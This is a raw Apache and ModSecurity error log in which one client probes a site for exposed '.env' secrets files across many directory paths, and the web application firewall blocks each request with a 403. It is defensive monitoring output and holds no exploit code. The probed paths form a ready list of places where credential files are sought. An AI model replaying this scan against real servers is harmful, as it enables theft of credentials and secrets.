[Tue Dec 02 08:38:21.678957 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/datavase/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/core/Datavase/.env"] [unique_id "aS6XbZvtKXnzGjDKyabjMQAAAAk"]
[Tue Dec 02 08:38:21.679201 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/core/Datavase/.env"] [unique_id "aS6XbZvtKXnzGjDKyabjMQAAAAk"]
[Tue Dec 02 08:38:21.679450 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/core/Datavase/.env"] [unique_id "aS6XbZvtKXnzGjDKyabjMQAAAAk"]
[Tue Dec 02 08:38:21.711424 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /database/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/database/.env"] [unique_id "aS6XbZvtKXnzGjDKyabjMgAAAAk"]
[Tue Dec 02 08:38:21.711734 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/database/.env"] [unique_id "aS6XbZvtKXnzGjDKyabjMgAAAAk"]
[Tue Dec 02 08:38:21.712003 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/database/.env"] [unique_id "aS6XbZvtKXnzGjDKyabjMgAAAAk"]
[Tue Dec 02 08:38:21.743276 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/config/.env"] [unique_id "aS6XbZvtKXnzGjDKyabjMwAAAAk"]
[Tue Dec 02 08:38:21.743573 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/config/.env"] [unique_id "aS6XbZvtKXnzGjDKyabjMwAAAAk"]
[Tue Dec 02 08:38:21.743891 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/config/.env"] [unique_id "aS6XbZvtKXnzGjDKyabjMwAAAAk"]
[Tue Dec 02 08:38:21.775069 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /assets/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/assets/.env"] [unique_id "aS6XbZvtKXnzGjDKyabjNAAAAAk"]
[Tue Dec 02 08:38:21.775318 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/assets/.env"] [unique_id "aS6XbZvtKXnzGjDKyabjNAAAAAk"]
[Tue Dec 02 08:38:21.775548 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/assets/.env"] [unique_id "aS6XbZvtKXnzGjDKyabjNAAAAAk"]
[Tue Dec 02 08:38:21.807631 2025] [authz_core:error] [pid 468147] [client 18.133.245.137:47928] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/.env
[Tue Dec 02 08:38:21.839261 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /apps/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/apps/.env"] [unique_id "aS6XbZvtKXnzGjDKyabjNgAAAAk"]
[Tue Dec 02 08:38:21.839589 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/apps/.env"] [unique_id "aS6XbZvtKXnzGjDKyabjNgAAAAk"]
[Tue Dec 02 08:38:21.839859 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/apps/.env"] [unique_id "aS6XbZvtKXnzGjDKyabjNgAAAAk"]
[Tue Dec 02 08:38:21.871054 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /uploads/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/uploads/.env"] [unique_id "aS6XbZvtKXnzGjDKyabjNwAAAAk"]
[Tue Dec 02 08:38:21.871278 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/uploads/.env"] [unique_id "aS6XbZvtKXnzGjDKyabjNwAAAAk"]
[Tue Dec 02 08:38:21.871521 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/uploads/.env"] [unique_id "aS6XbZvtKXnzGjDKyabjNwAAAAk"]
[Tue Dec 02 08:38:21.902734 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /sitemaps/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/sitemaps/.env"] [unique_id "aS6XbZvtKXnzGjDKyabjOAAAAAk"]
[Tue Dec 02 08:38:21.902955 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/sitemaps/.env"] [unique_id "aS6XbZvtKXnzGjDKyabjOAAAAAk"]
[Tue Dec 02 08:38:21.903193 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/sitemaps/.env"] [unique_id "aS6XbZvtKXnzGjDKyabjOAAAAAk"]
[Tue Dec 02 08:38:21.934263 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /saas/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/saas/.env"] [unique_id "aS6XbZvtKXnzGjDKyabjOQAAAAk"]
[Tue Dec 02 08:38:21.934525 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/saas/.env"] [unique_id "aS6XbZvtKXnzGjDKyabjOQAAAAk"]
[Tue Dec 02 08:38:21.934726 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/saas/.env"] [unique_id "aS6XbZvtKXnzGjDKyabjOQAAAAk"]
[Tue Dec 02 08:38:21.965746 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/api/.env"] [unique_id "aS6XbZvtKXnzGjDKyabjOgAAAAk"]
[Tue Dec 02 08:38:21.965962 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/api/.env"] [unique_id "aS6XbZvtKXnzGjDKyabjOgAAAAk"]
[Tue Dec 02 08:38:21.966171 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/api/.env"] [unique_id "aS6XbZvtKXnzGjDKyabjOgAAAAk"]
[Tue Dec 02 08:38:21.997419 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /psnlink/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/psnlink/.env"] [unique_id "aS6XbZvtKXnzGjDKyabjOwAAAAk"]
[Tue Dec 02 08:38:21.997635 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/psnlink/.env"] [unique_id "aS6XbZvtKXnzGjDKyabjOwAAAAk"]
[Tue Dec 02 08:38:21.997847 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/psnlink/.env"] [unique_id "aS6XbZvtKXnzGjDKyabjOwAAAAk"]
[Tue Dec 02 08:38:22.029069 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /exapi/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/exapi/.env"] [unique_id "aS6XbpvtKXnzGjDKyabjPAAAAAk"]
[Tue Dec 02 08:38:22.029307 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/exapi/.env"] [unique_id "aS6XbpvtKXnzGjDKyabjPAAAAAk"]
[Tue Dec 02 08:38:22.029540 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/exapi/.env"] [unique_id "aS6XbpvtKXnzGjDKyabjPAAAAAk"]
[Tue Dec 02 08:38:22.060818 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /site/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/site/.env"] [unique_id "aS6XbpvtKXnzGjDKyabjPQAAAAk"]
[Tue Dec 02 08:38:22.061050 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/site/.env"] [unique_id "aS6XbpvtKXnzGjDKyabjPQAAAAk"]
[Tue Dec 02 08:38:22.061261 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/site/.env"] [unique_id "aS6XbpvtKXnzGjDKyabjPQAAAAk"]
[Tue Dec 02 08:38:22.093157 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/admin/.env"] [unique_id "aS6XbpvtKXnzGjDKyabjPgAAAAk"]
[Tue Dec 02 08:38:22.093394 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/admin/.env"] [unique_id "aS6XbpvtKXnzGjDKyabjPgAAAAk"]
[Tue Dec 02 08:38:22.093612 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/admin/.env"] [unique_id "aS6XbpvtKXnzGjDKyabjPgAAAAk"]
[Tue Dec 02 08:38:22.124799 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /web/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/web/.env"] [unique_id "aS6XbpvtKXnzGjDKyabjPwAAAAk"]
